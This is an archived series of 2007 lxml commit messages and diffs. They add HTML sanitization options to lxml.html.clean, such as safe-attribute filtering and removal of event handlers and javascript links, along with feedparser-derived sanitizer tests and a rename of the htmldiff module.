+ body.tag = 'div' + return body + +def _element_name(el): + if isinstance(el, etree.CommentBase): + return 'comment' + elif isinstance(el, basestring): + return 'string' + else: + return el.tag + def Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 20:11:25 2007 @@ -1,7 +1,7 @@ import re from lxml import etree from lxml.html import defs -from lxml.html import parse_element, tostring +from lxml.html import parse, tostring __all__ = ['clean_html', 'clean'] @@ -25,26 +25,36 @@ Like clean(), but takes a text input document, and returns a text document. """ - doc = parse_element(html, create_parent=True) + doc = parse(html) clean(doc, **kw) return tostring(doc) +def _itertree(el): + """ + Return the element's descendants, and the element itself + """ + yield el + for item in el.iterdescendants(): + yield item + def clean(doc, scripts=True, javascript=True, comments=True, # process instructions? style=False, - links=False, - meta=False, - page_structure=False, + links=True, + meta=True, + page_structure=True, embedded=True, frames=True, forms=True, + annoying_tags=True, remove_tags=None, allow_tags=None, strip_tags=True, remove_unknown_tags=True, + safe_attrs_only=True, add_nofollow=False, # callbacks? ): @@ -70,7 +80,8 @@ Remove any ``<meta>`` tags ``page_structure``: - Structural parts of a page: ``<head>``, ``<html>``, ``<title>`` + Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. + Also xmlns attributes are removed with this. ``embedded``: Remove any embedded objects (flash, iframes) @@ -81,6 +92,9 @@ ``forms``: Remove any form tags + ``annoying_tags``: + Tags that aren't *wrong*, but are annoying. ``<blink>`` (FIXME: marquee?) + ``remove_tags``: A list of tags to remove. 
@@ -95,6 +109,11 @@ ``remove_unknown_tags``: Remove any tags that aren't standard parts of HTML. + ``safe_attrs_only``: + If true, only include 'safe' attributes (specifically the list + from `feedparser + <http://feedparser.org/docs/html-sanitization.html>`_). + ``add_nofollow``: If true, then any <a> tags will have ``rel="nofollow"`` added to them. @@ -108,12 +127,23 @@ remove_tags = list(remove_tags or []) if scripts: kill_tags.append('script') + if safe_attrs_only: + safe_attrs = set(defs.safe_attrs) + for el in _itertree(doc): + for aname in el.attrib.keys(): + if aname not in defs.safe_attrs: + del el.attrib[aname] if javascript: - for attrib in defs.event_attrs: - for el in doc.xpath('descendant-or-self::*[@%s]' % attrib): - del el.attrib[attrib] + if not safe_attrs_only: + # safe_attrs handles events attributes itself + for el in _itertree(doc): + for aname in el.attrib.keys(): + if aname.startswith('on'): + del el.attrib[aname] doc.rewrite_links(_remove_javascript, resolve_base_href=False) if not style: + # If we're deleting style then we don't have to remove JS links + # from styles, otherwise... for el in doc.xpath('descendant-or-self::*[@style]'): old = el.attrib['style'] new = _css_javascript_re.sub('', old) @@ -127,7 +157,7 @@ if comments: # Easier way? bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if isinstance(el, etree._Comment): bad.append(el) for el in bad: @@ -144,16 +174,25 @@ kill_tags.append('meta') if page_structure: remove_tags.extend(['head', 'html', 'title']) + # FIXME: is this really the right place to remove these attributes? + for el in doc.xpath('descendant-or-self::*[@xmlns]'): + del el.attrib['xmlns'] if embedded: # FIXME: is <layer> really embedded? 
- kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) + kill_tags.extend(['applet', 'param']) + # The alternate contents that are in an iframe are a good fallback: + # FIXME: somehow embed seems to be getting data, but from what I + # can tell the embed tag is supposed to always be empty + remove_tags.extend(['iframe', 'object', 'embed', 'layer']) if frames: kill_tags.extend(defs.frame_tags) if forms: remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) + if annoying_tags: + remove_tags.extend(['blink']) bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if el.tag in kill_tags: bad.append(el) for el in bad: @@ -164,7 +203,13 @@ for tag in remove_tags]) for el in doc.xpath(xpath): if strip_tags: - el.drop_tag() + if el.getparent(): + el.drop_tag() + else: + # We have to drop the parent-most tag, which we can't + # do. Instead we'll rewrite it: + el.tag = 'div' + el.attrib.clear() else: # FIXME: Should we test if this has been removed because of a parent? 
el.drop_element() @@ -175,7 +220,7 @@ allow_tags = defs.tags if allow_tags: bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if el.tag not in allow_tags: bad.append(el) for el in bad: Modified: lxml/branch/html/src/lxml/html/defs.py ============================================================================== --- lxml/branch/html/src/lxml/html/defs.py (original) +++ lxml/branch/html/src/lxml/html/defs.py Fri Jun 1 20:11:25 2007 @@ -19,14 +19,27 @@ 'usemap'] # Not in the HTML 4 spec: -# onerror +# onerror, onresize event_attrs = [ 'onblur', 'onchange', 'onclick', 'ondblclick', 'onerror', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload', 'onmousedown', 'onmousemove', 'onmouseout', 'onmouseover', - 'onmouseup', 'onreset', 'onselect', 'onsubmit', 'onunload', + 'onmouseup', 'onreset', 'onresize', 'onselect', 'onsubmit', + 'onunload', ] +safe_attrs = [ + 'abbr', 'accept', 'accept-charset', 'accesskey', 'action', 'align', + 'alt', 'axis', 'border', 'cellpadding', 'cellspacing', 'char', 'charoff', + 'charset', 'checked', 'cite', 'class', 'clear', 'cols', 'colspan', + 'color', 'compact', 'coords', 'datetime', 'dir', 'disabled', 'enctype', + 'for', 'frame', 'headers', 'height', 'href', 'hreflang', 'hspace', 'id', + 'ismap', 'label', 'lang', 'longdesc', 'maxlength', 'media', 'method', + 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', + 'rel', 'rev', 'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', + 'size', 'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title', + 'type', 'usemap', 'valign', 'value', 'vspace', 'width'] + # From http://htmlhelp.com/reference/html40/olist.html top_level_tags = [ 'html', 'head', 'body', 'frameset', Added: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Fri Jun 1 20:11:25 2007 @@ -0,0 +1,83 @@ 
+import os +import re +import rfc822 +import unittest +from lxml.tests.common_imports import doctest +from lxml.doctestcompare import LHTMLOutputChecker + +from lxml.html import HTML, parse_element +from lxml.html.clean import clean, clean_html + +feed_dir = os.path.join(os.path.dirname(__file__), 'feedparser-data') +bar_re = re.compile(r"-----+") + +class DummyInput: + def __init__(self, **kw): + for name, value in kw.items(): + setattr(self, name, value) + +class FeedTestCase(unittest.TestCase): + + def __init__(self, filename): + self.filename = filename + unittest.TestCase.__init__(self) + + def parse(self): + f = open(self.filename, 'rb') + headers = rfc822.Message(f) + c = f.read() + f.close() + if not headers.keys(): + raise Exception( + "File %s has no headers" % self.filename) + self.description = headers['Description'] + self.expect = headers['Expect'] + self.ignore = headers.get('Ignore') + self.options = [ + o.strip() for o in headers['Options'].split(',') + if o.strip()] + parts = bar_re.split(c) + self.input = parts[0].rstrip() + '\n' + if parts[1:]: + self.expect = parts[1].rstrip() + '\n' + else: + self.expect = None + + def runTest(self): + self.parse() + if self.ignore: + # We've marked this test to be ignored. 
+ return + kw = {} + for name in self.options: + if name.startswith('-'): + kw[name[1:]] = False + else: + kw[name] = True + transformed = clean_html(self.input, **kw) + assert self.expect is not None, ( + "No expected output in %s" % self.filename) + checker = LHTMLOutputChecker() + if not checker.check_output(self.expect, transformed, 0): + result = checker.output_difference( + DummyInput(want=self.expect), transformed, 0) + #result += '\noptions: %s %r' % (', '.join(self.options), kw) + #result += repr(transformed) + raise Exception("\n"+result) + + def shortDescription(self): + return self.filename + +def test_suite(): + suite = unittest.TestSuite() + for fn in os.listdir(feed_dir): + fn = os.path.join(feed_dir, fn) + if fn.endswith('.data'): + case = FeedTestCase(fn) + suite.addTests([case]) + # This is my lazy way of stopping on first error: + try: + case.runTest() + except: + break + return suite Added: lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py Fri Jun 1 20:11:25 2007 @@ -0,0 +1,110 @@ +""" +This takes the feedparser tests from here: + + http://feedparser.org/tests/wellformed/sanitize/ + +and rewrites them to be easier to handle (not using the internal model +of feedparser). The input format is:: + + <!-- + Description: {description} + Expect: {expression} + --> + ... + <content ...>{content}</content> + ... + +The Expect expression is checked for +``entries[0]['content'][0]['value'] == {data}``. 
+ +The output format is:: + + Description: {description} + Expect: {expression} (if data couldn't be parsed) + Options: + + {content, unescaped} + ---------- + {data, unescaped, if found} + +""" + +import re +import os +import traceback + +_desc_re = re.compile(r'\s*Description:\s*(.*)') +_expect_re = re.compile(r'\s*Expect:\s*(.*)') +_data_expect_re = re.compile(r"entries\[0\]\['[^']+'\](?:\[0\]\['value'\])?\s*==\s*(.*)") +_feed_data_expect_re = re.compile(r"feed\['[^']+'\]\s*==\s*(.*)") + +def parse_content(content): + match = _desc_re.search(content) + desc = match.group(1) + match = _expect_re.search(content) + expect = match.group(1) + data = None + for regex in [_data_expect_re, _feed_data_expect_re]: + match = regex.search(expect) + if match: + # Icky, but I'll trust it + data = eval(match.group(1).strip()) + break + c = None + for tag in ['content', 'summary', 'title', 'copyright', 'tagline', 'info', 'subtitle', 'fullitem', 'body', 'description', 'content:encoded']: + regex = re.compile(r"<%s.*?>(.*)</%s>" % (tag, tag), re.S) + match = regex.search(content) + if match: + c = match.group(1) + break + assert c is not None + # Seems like body isn't quoted + if tag != 'body': + c = c.replace('<', '<') + c = c.replace('&', '&') + # FIXME: I should really do more unescaping... 
+ return { + 'Description': desc, + 'Expect': expect, + 'data': data, + 'content': c} + +def serialize_content(d): + s = '''\ +Description: %(Description)s +Expect: %(Expect)s +Options: + +%(content)s +''' % d + if d.get('data') is not None: + s += '----------\n%s' % d['data'] + return s + +def translate_file(filename): + f = open(filename, 'rb') + c = f.read() + f.close() + try: + output = serialize_content(parse_content(c)) + except: + print 'Bad data in %s:' % filename + print c + traceback.print_exc() + print '-'*60 + return + new = os.path.splitext(filename)[0] + '.data' + f = open(new, 'wb') + f.write(output) + f.close() + +def translate_all(dir): + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if fn.endswith('.xml'): + translate_file(fn) + +if __name__ == '__main__': + import sys + translate_all(os.path.join(os.path.dirname(__file__), 'feedparser-data')) + From ianb at codespeak.net Fri Jun 1 20:23:36 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 20:23:36 +0200 (CEST) Subject: [Lxml-checkins] r43977 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070601182336.70C0280AD@code0.codespeak.net> Author: ianb Date: Fri Jun 1 20:23:35 2007 New Revision: 43977 Added: lxml/branch/html/src/lxml/html/diff.py - copied, changed from r43962, lxml/branch/html/src/lxml/html/htmldiff.py lxml/branch/html/src/lxml/html/tests/test_diff.py - copied, changed from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.py lxml/branch/html/src/lxml/html/tests/test_diff.txt - copied, changed from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Removed: lxml/branch/html/src/lxml/html/htmldiff.py lxml/branch/html/src/lxml/html/tests/test_htmldiff.py lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Remove debugging print; rename htmldiff to diff (lxml.html.diff) Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 20:23:35 2007 @@ -316,8 +316,6 @@ if not isinstance(create_parent, basestring): create_parent = 'div' return parse_element('<%s>%s</%s>' % (create_parent, html, create_parent)) - else: - print '----------\n', html elements = parse_elements(html, no_leading_text=True) if not elements: raise etree.ParserError( Copied: lxml/branch/html/src/lxml/html/diff.py (from r43962, lxml/branch/html/src/lxml/html/htmldiff.py) ============================================================================== --- lxml/branch/html/src/lxml/html/htmldiff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Fri Jun 1 20:23:35 2007 @@ -770,7 +770,8 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - _merge_element_contents(el) + el.drop_tag() + #_merge_element_contents(el) def _contains_block_level_tag(el): """True if the element contains any block-level elements, like <p>, <td>, etc. 
Deleted: /lxml/branch/html/src/lxml/html/htmldiff.py ============================================================================== --- /lxml/branch/html/src/lxml/html/htmldiff.py Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,890 +0,0 @@ -import difflib -from lxml import etree -from lxml.html import parse_element -import cgi -import re - -__all__ = ['html_annotate', 'htmldiff'] - - -############################################################ -## Annotation -############################################################ - -def default_markup(text, version): - return '<span title="%s">%s</span>' % ( - cgi.escape(unicode(version), 1), text) - -def html_annotate(doclist, markup=default_markup): - """ - doclist should be ordered from oldest to newest, like:: - - >>> version1 = 'Hello World' - >>> version2 = 'Goodbye World' - >>> html_annotate([(version1, 'version 1'), - ... (version2, 'version 2')]) - u'<span title="version 2">Goodbye</span> <span title="version 1">World</span>' - - The documents must be *fragments* (str/UTF8 or unicode), not - complete documents - - The markup argument is a function to markup the spans of words. - This function is called like markup('Hello', 'version 2'), and - returns HTML. The first argument is text and never includes any - markup. The default uses a span with a title: - - >>> default_markup('Some Text', 'by Joe') - u'<span title="by Joe">Some Text</span>' - """ - # The basic strategy we have is to split the documents up into - # logical tokens (which are words with attached markup). We then - # do diffs of each of the versions to track when a token first - # appeared in the document; the annotation attached to the token - # is the version where it first appeared. 
- tokenlist = [tokenize_annotated(doc, version) - for doc, version in doclist] - cur_tokens = tokenlist[0] - for tokens in tokenlist[1:]: - html_annotate_merge_annotations(cur_tokens, tokens) - cur_tokens = tokens - - # After we've tracked all the tokens, we can combine spans of text - # that are adjacent and have the same annotation - cur_tokens = compress_tokens(cur_tokens) - # And finally add markup - result = markup_serialize_tokens(cur_tokens, markup) - return ''.join(result).strip() - -def tokenize_annotated(doc, annotation): - """Tokenize a document and add an annotation attribute to each token - """ - tokens = tokenize(doc, include_hrefs=False) - for tok in tokens: - tok.annotation = annotation - return tokens - -def html_annotate_merge_annotations(tokens_old, tokens_new): - """Merge the annotations from tokens_old into tokens_new, when the - tokens in the new document already existed in the old document. - """ - s = InsensitiveSequenceMatcher(a=tokens_old, b=tokens_new) - commands = s.get_opcodes() - - for command, i1, i2, j1, j2 in commands: - if command == 'equal': - eq_old = tokens_old[i1:i2] - eq_new = tokens_new[j1:j2] - copy_annotations(eq_old, eq_new) - -def copy_annotations(src, dest): - """ - Copy annotations from the tokens listed in src to the tokens in dest - """ - assert len(src) == len(dest) - for src_tok, dest_tok in zip(src, dest): - dest_tok.annotation = src_tok.annotation - -def compress_tokens(tokens): - """ - Combine adjacent tokens when there is no HTML between the tokens, - and they share an annotation - """ - result = [tokens[0]] - for tok in tokens[1:]: - if (not result[-1].post_tags and - not tok.pre_tags and - result[-1].annotation == tok.annotation): - compress_merge_back(result, tok) - else: - result.append(tok) - return result - -def compress_merge_back(tokens, tok): - """ Merge tok into the last element of tokens (modifying the list of - tokens in-place). 
""" - last = tokens[-1] - if type(last) is not token or type(tok) is not token: - tokens.append(tok) - else: - text = unicode(last) - if last.trailing_whitespace: - text += ' ' - text += tok - merged = token(text, - pre_tags=last.pre_tags, - post_tags=tok.post_tags, - trailing_whitespace=tok.trailing_whitespace) - merged.annotation = last.annotation - tokens[-1] = merged - -def markup_serialize_tokens(tokens, markup_func): - """ - Serialize the list of tokens into a list of text chunks, calling - markup_func around text to add annotations. - """ - for token in tokens: - for pre in token.pre_tags: - yield pre - html = token.html() - html = markup_func(html, token.annotation) - if token.trailing_whitespace: - html += ' ' - yield html - for post in token.post_tags: - yield post - - -############################################################ -## HTML Diffs -############################################################ - -def htmldiff(old_html, new_html): - """ Do a diff of the old and new document. The documents are HTML - *fragments* (str/UTF8 or unicode), they are not complete documents - (i.e., no <html> tag). - - Returns HTML with <ins> and <del> tags added around the - appropriate text. - - Markup is generally ignored, with the markup from new_html - preserved, and possibly some markup from old_html (though it is - considered acceptable to lose some of the old markup). Only the - words in the HTML are diffed. The exception is <img> tags, which - are treated like words, and the href attribute of <a> tags, which - are noted inside the tag itself when there are changes. - """ - old_html_tokens = tokenize(old_html) - new_html_tokens = tokenize(new_html) - result = htmldiff_tokens(old_html_tokens, new_html_tokens) - result = ''.join(result).strip() - return fixup_ins_del_tags(result) - -def htmldiff_tokens(html1_tokens, html2_tokens): - """ Does a diff on the tokens themselves, returning a list of text - chunks (not tokens). 
- """ - # There are several passes as we do the differences. The tokens - # isolate the portion of the content we care to diff; difflib does - # all the actual hard work at that point. - # - # Then we must create a valid document from pieces of both the old - # document and the new document. We generally prefer to take - # markup from the new document, and only do a best effort attempt - # to keep markup from the old document; anything that we can't - # resolve we throw away. Also we try to put the deletes as close - # to the location where we think they would have been -- because - # we are only keeping the markup from the new document, it can be - # fuzzy where in the new document the old text would have gone. - # Again we just do a best effort attempt. - s = InsensitiveSequenceMatcher(a=html1_tokens, b=html2_tokens) - commands = s.get_opcodes() - result = [] - for command, i1, i2, j1, j2 in commands: - if command == 'equal': - result.extend(expand_tokens(html2_tokens[j1:j2], equal=True)) - continue - if command == 'insert' or command == 'replace': - ins_tokens = expand_tokens(html2_tokens[j1:j2]) - merge_insert(ins_tokens, result) - if command == 'delete' or command == 'replace': - del_tokens = expand_tokens(html1_tokens[i1:i2]) - merge_delete(del_tokens, result) - # If deletes were inserted directly as <del> then we'd have an - # invalid document at this point. Instead we put in special - # markers, and when the complete diffed document has been created - # we try to move the deletes around and resolve any problems. - result = cleanup_delete(result) - - return result - -def expand_tokens(tokens, equal=False): - """Given a list of tokens, return a generator of the chunks of - text for the data in the tokens. 
- """ - for token in tokens: - for pre in token.pre_tags: - yield pre - if not equal or not token.hide_when_equal: - if token.trailing_whitespace: - yield token.html() + ' ' - else: - yield token.html() - for post in token.post_tags: - yield post - -def merge_insert(ins_chunks, doc): - """ doc is the already-handled document (as a list of text chunks); - here we add <ins>ins_chunks</ins> to the end of that. """ - # Though we don't throw away unbalanced_start or unbalanced_end - # (we assume there is accompanying markup later or earlier in the - # document), we only put <ins> around the balanced portion. - unbalanced_start, balanced, unbalanced_end = split_unbalanced(ins_chunks) - doc.extend(unbalanced_start) - if doc and not doc[-1].endswith(' '): - # Fix up the case where the word before the insert didn't end with - # a space - doc[-1] += ' ' - doc.append('<ins>') - if balanced and balanced[-1].endswith(' '): - # We move space outside of </ins> - balanced[-1] = balanced[-1][:-1] - doc.extend(balanced) - doc.append('</ins> ') - doc.extend(unbalanced_end) - -# These are sentinals to represent the start and end of a <del> -# segment, until we do the cleanup phase to turn them into proper -# markup: -class DEL_START: - pass -class DEL_END: - pass - -class NoDeletes(Exception): - """ Raised when the document no longer contains any pending deletes - (DEL_START/DEL_END) """ - -def merge_delete(del_chunks, doc): - """ Adds the text chunks in del_chunks to the document doc (another - list of text chunks) with marker to show it is a delete. - cleanup_delete later resolves these markers into <del> tags.""" - doc.append(DEL_START) - doc.extend(del_chunks) - doc.append(DEL_END) - -def cleanup_delete(chunks): - """ Cleans up any DEL_START/DEL_END markers in the document, replacing - them with <del></del>. To do this while keeping the document - valid, it may need to drop some tags (either start or end tags). 
- - It may also move the del into adjacent tags to try to move it to a - similar location where it was originally located (e.g., moving a - delete into preceding <div> tag, if the del looks like (DEL_START, - 'Text</div>', DEL_END)""" - while 1: - # Find a pending DEL_START/DEL_END, splitting the document - # into stuff-preceding-DEL_START, stuff-inside, and - # stuff-following-DEL_END - try: - pre_delete, delete, post_delete = split_delete(chunks) - except NoDeletes: - # Nothing found, we've cleaned up the entire doc - break - # The stuff-inside-DEL_START/END may not be well balanced - # markup. First we figure out what unbalanced portions there are: - unbalanced_start, balanced, unbalanced_end = split_unbalanced(delete) - # Then we move the span forward and/or backward based on these - # unbalanced portions: - locate_unbalanced_start(unbalanced_start, pre_delete, post_delete) - locate_unbalanced_end(unbalanced_end, pre_delete, post_delete) - doc = pre_delete - if doc and not doc[-1].endswith(' '): - # Fix up case where the word before us didn't have a trailing space - doc[-1] += ' ' - doc.append('<del>') - if balanced and balanced[-1].endswith(' '): - # We move space outside of </del> - balanced[-1] = balanced[-1][:-1] - doc.extend(balanced) - doc.append('</del> ') - doc.extend(post_delete) - chunks = doc - return chunks - -def split_unbalanced(chunks): - """Return (unbalanced_start, balanced, unbalanced_end), where each is - a list of text and tag chunks. - - unbalanced_start is a list of all the tags that are opened, but - not closed in this span. Similarly, unbalanced_end is a list of - tags that are closed but were not opened. 
Extracting these might - mean some reordering of the chunks.""" - start = [] - end = [] - tag_stack = [] - balanced = [] - for chunk in chunks: - if not chunk.startswith('<'): - balanced.append(chunk) - continue - endtag = chunk[1] == '/' - name = chunk.split()[0].strip('<>/') - if name in empty_tags: - assert not endtag, ( - "Empty tag %r should have no end tag" % chunk) - balanced.append(chunk) - continue - if endtag: - if tag_stack and tag_stack[-1][0] == name: - balanced.append(chunk) - name, pos, tag = tag_stack.pop() - balanced[pos] = tag - elif tag_stack: - start.extend(tag for name, pos, tag in tag_stack) - tag_stack = [] - end.append(chunk) - else: - end.append(chunk) - else: - tag_stack.append((name, len(balanced), chunk)) - balanced.append(None) - start.extend( - [chunk for name, pos, chunk in tag_stack]) - balanced = [chunk for chunk in balanced if chunk is not None] - return start, balanced, end - -def split_delete(chunks): - """ Returns (stuff_before_DEL_START, stuff_inside_DEL_START_END, - stuff_after_DEL_END). Returns the first case found (there may be - more DEL_STARTs in stuff_after_DEL_END). Raises NoDeletes if - there's no DEL_START found. """ - try: - pos = chunks.index(DEL_START) - except ValueError: - raise NoDeletes - pos2 = chunks.index(DEL_END) - return chunks[:pos], chunks[pos+1:pos2], chunks[pos2+1:] - -def locate_unbalanced_start(unbalanced_start, pre_delete, post_delete): - """ pre_delete and post_delete implicitly point to a place in the - document (where the two were split). This moves that point (by - popping items from one and pushing them onto the other). It moves - the point to try to find a place where unbalanced_start applies. 
- - As an example:: - - >>> unbalanced_start = ['<div>'] - >>> doc = ['<p>', 'Text', '</p>', '<div>', 'More Text', '</div>'] - >>> pre, post = doc[:3], doc[3:] - >>> pre, post - (['<p>', 'Text', '</p>'], ['<div>', 'More Text', '</div>']) - >>> locate_unbalanced_start(unbalanced_start, pre, post) - >>> pre, post - (['<p>', 'Text', '</p>', '<div>'], ['More Text', '</div>']) - - As you can see, we moved the point so that the dangling <div> that - we found will be effectively replaced by the div in the original - document. If this doesn't work out, we just throw away - unbalanced_start without doing anything. - """ - while 1: - if not unbalanced_start: - # We have totally succeded in finding the position - break - finding = unbalanced_start[0] - finding_name = finding.split()[0].strip('<>') - if not post_delete: - break - next = post_delete[0] - if next is DEL_START or not next.startswith('<'): - # Reached a word, we can't move the delete text forward - break - if next[1] == '/': - # Reached a closing tag, can we go further? Maybe not... - break - name = next.split()[0].strip('<>') - if name == 'ins': - # Can't move into an insert - break - assert name != 'del', ( - "Unexpected delete tag: %r" % next) - if name == finding_name: - unbalanced_start.pop(0) - pre_delete.append(post_delete.pop(0)) - else: - # Found a tag that doesn't match - break - -def locate_unbalanced_end(unbalanced_end, pre_delete, post_delete): - """ like locate_unbalanced_start, except handling end tags and - possibly moving the point earlier in the document. 
""" - while 1: - if not unbalanced_end: - # Success - break - finding = unbalanced_end[-1] - finding_name = finding.split()[0].strip('<>/') - if not pre_delete: - break - next = pre_delete[-1] - if next is DEL_END or not next.startswith('</'): - # A word or a start tag - break - name = next.split()[0].strip('<>/') - if name == 'ins' or name == 'del': - # Can't move into an insert or delete - break - if name == finding_name: - unbalanced_end.pop() - post_delete.insert(0, pre_delete.pop()) - else: - # Found a tag that doesn't match - break - -class token(unicode): - """ Represents a diffable token, generally a word that is displayed to - the user. Opening tags are attached to this token when they are - adjacent (pre_tags) and closing tags that follow the word - (post_tags). Some exceptions occur when there are empty tags - adjacent to a word, so there may be close tags in pre_tags, or - open tags in post_tags. - - We also keep track of whether the word was originally followed by - whitespace, even though we do not want to treat the word as - equivalent to a similar word that does not have a trailing - space.""" - - # When this is true, the token will be eliminated from the - # displayed diff if no change has occurred: - hide_when_equal = False - - def __new__(cls, text, pre_tags=None, post_tags=None, trailing_whitespace=False): - obj = unicode.__new__(cls, text) - - if pre_tags is not None: - obj.pre_tags = pre_tags - else: - obj.pre_tags = [] - - if post_tags is not None: - obj.post_tags = post_tags - else: - obj.post_tags = [] - - obj.trailing_whitespace = trailing_whitespace - - return obj - - def __repr__(self): - return 'token(%s, %r, %r)' % (unicode.__repr__(self), self.pre_tags, self.post_tags) - - def html(self): - return unicode(self) - -class tag_token(token): - - """ Represents a token that is actually a tag. Currently this is just - the <img> tag, which takes up visible space just like a word but - is only represented in a document by a tag. 
""" - - def __new__(cls, tag, data, html_repr, pre_tags=None, - post_tags=None, trailing_whitespace=False): - obj = token.__new__(cls, "%s: %s" % (type, data), - pre_tags=pre_tags, - post_tags=post_tags, - trailing_whitespace=trailing_whitespace) - obj.tag = tag - obj.data = data - obj.html_repr = html_repr - return obj - - def __repr__(self): - return 'tag_token(%s, %s, html_repr=%s, post_tags=%r, pre_tags=%r, trailing_whitespace=%s)' % ( - self.tag, - self.data, - self.html_repr, - self.pre_tags, - self.post_tags, - self.trailing_whitespace) - def html(self): - return self.html_repr - -class href_token(token): - - """ Represents the href in an anchor tag. Unlike other words, we only - show the href when it changes. """ - - hide_when_equal = True - - def html(self): - return 'Link: %s' % self - -def tokenize(html, include_hrefs=True): - """ - Parse the given HTML and returns token objects (words with attached tags). - - This parses only the content of a page; anything in the head is - ignored, and the <head> and <body> elements are themselves - optional. The content is then parsed by lxml, which ensures the - validity of the resulting parsed document (though lxml may make - incorrect guesses when the markup is particular bad). - - <ins> and <del> tags are also eliminated from the document, as - that gets confusing. - - If include_hrefs is true, then the href attribute of <a> tags is - included as a special kind of diffable token.""" - body_el = parse_html(html, cleanup=True) - # Then we split the document into text chunks for each tag, word, and end tag: - chunks = flatten_el(body_el, drop_tag=True, include_hrefs=include_hrefs) - # Finally re-joining them into token objects: - return fixup_chunks(chunks) - -def parse_html(html, cleanup=True): - """ - Parses an HTML fragment, returning an lxml element. Note that the HTML will be - wrapped in a <div> tag that was not in the original document. 
- - If cleanup is true, make sure there's no <head> or <body>, and get - rid of any <ins> and <del> tags. - """ - if cleanup: - # This removes any extra markup or structure like <head>: - html = cleanup_html(html) - return parse_element(html, create_parent=True) - -_body_re = re.compile(r'<body.*?>', re.I|re.S) -_end_body_re = re.compile(r'</body.*?>', re.I|re.S) -_ins_del_re = re.compile(r'</?(ins|del).*?>', re.I|re.S) - -def cleanup_html(html): - """ This 'cleans' the HTML, meaning that any page structure is removed - (only the contents of <body> are used, if there is any <body). - Also <ins> and <del> tags are removed. """ - match = _body_re.search(html) - if match: - html = html[match.end():] - match = _end_body_re.search(html) - if match: - html = html[:match.start()] - html = _ins_del_re.sub('', html) - return html - - -end_whitespace_re = re.compile(r'[ \t\n\r]$') - -def fixup_chunks(chunks): - """ - This function takes a list of chunks and produces a list of tokens. - """ - tag_accum = [] - cur_word = None - result = [] - for chunk in chunks: - if isinstance(chunk, tuple): - if chunk[0] == 'img': - src = chunk[1] - tag = chunk[2] - if tag.endswith(' '): - tag = tag[:-1] - trailing_whitespace = True - else: - trailing_whitespace = False - cur_word = tag_token('img', src, html_repr=tag, - pre_tags=tag_accum, - trailing_whitespace=trailing_whitespace) - tag_accum = [] - result.append(cur_word) - elif chunk[0] == 'href': - href = chunk[1] - cur_word = href_token(href, pre_tags=tag_accum, trailing_whitespace=True) - tag_accum = [] - result.append(cur_word) - continue - if is_word(chunk): - if chunk.endswith(' '): - chunk = chunk[:-1] - trailing_whitespace = True - else: - trailing_whitespace = False - cur_word = token(chunk, pre_tags=tag_accum, trailing_whitespace=trailing_whitespace) - tag_accum = [] - result.append(cur_word) - elif is_start_tag(chunk): - tag_accum.append(chunk) - elif is_end_tag(chunk): - if tag_accum: - tag_accum.append(chunk) - else: - 
assert cur_word, ( - "Weird state, cur_word=%r, result=%r, chunks=%r of %r" - % (cur_word, result, chunk, chunks)) - cur_word.post_tags.append(chunk) - else: - assert(0) - - if not result: - return [token('', pre_tags=tag_accum)] - else: - result[-1].post_tags.extend(tag_accum) - - return result - - -# All the tags in HTML that don't require end tags: -empty_tags = ( - 'param', 'img', 'area', 'br', 'basefont', 'input', - 'base', 'meta', 'link', 'col') - -block_level_tags = ( - 'address', - 'blockquote', - 'center', - 'dir', - 'div', - 'dl', - 'fieldset', - 'form', - 'h1', - 'h2', - 'h3', - 'h4', - 'h5', - 'h6', - 'hr', - 'isindex', - 'menu', - 'noframes', - 'noscript', - 'ol', - 'p', - 'pre', - 'table', - 'ul', - ) - -block_level_container_tags = ( - 'dd', - 'dt', - 'frameset', - 'li', - 'tbody', - 'td', - 'tfoot', - 'th', - 'thead', - 'tr', - ) - - -def flatten_el(el, include_hrefs, drop_tag=False): - """ Takes an lxml element el, and generates all the text chunks for - that tag. Each start tag is a chunk, each word is a chunk, and each - end tag is a chunk. - - If drop_tag is true, then the outermost container tag is - not returned (just its contents).""" - if not drop_tag: - if el.tag == 'img': - yield ('img', el.attrib['src'], start_tag(el)) - else: - yield start_tag(el) - if el.tag in empty_tags and not el.text and not len(el): - return - start_words = split_words(el.text) - for word in start_words: - yield cgi.escape(word) - for child in el: - for item in flatten_el(child, include_hrefs=include_hrefs): - yield item - if el.tag == 'a' and el.attrib.get('href') and include_hrefs: - yield ('href', el.attrib['href']) - if not drop_tag: - yield end_tag(el) - end_words = split_words(el.tail) - for word in end_words: - yield cgi.escape(word) - -def split_words(text): - """ Splits some text into words. Includes trailing whitespace (one - space) on each word when appropriate. 
